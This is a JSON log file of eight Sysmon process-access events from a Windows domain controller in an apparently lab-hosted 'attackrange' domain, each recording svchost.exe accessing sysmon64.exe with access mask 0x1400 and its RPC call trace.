{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2548,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2549,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2550,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2551,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2552,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2553,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2554,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2555,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
